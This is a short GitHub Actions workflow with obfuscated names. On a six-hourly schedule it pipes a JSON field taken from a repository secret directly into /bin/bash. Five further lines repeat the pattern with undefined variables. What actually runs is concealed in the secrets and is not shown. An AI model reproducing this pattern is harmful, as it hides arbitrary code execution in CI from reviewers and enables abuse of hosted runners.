name: henheliangxiang

on:
  workflow_dispatch:
  schedule:
    - cron: '6 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: henheliangxiang
        env:
          c08: ${{ secrets.c08 }}
        run: |
          echo $c08 | jq -r .sswgw78 | /bin/bash
          echo $xks4 | jq -r .g51 | /bin/bash
          echo $o21826 | jq -r .jhkp471 | /bin/bash
          echo $aqo50790 | jq -r .y44115 | /bin/bash
          echo $ib596 | jq -r .fz522 | /bin/bash
          echo $rsor41494 | jq -r .abuw42174 | /bin/bash

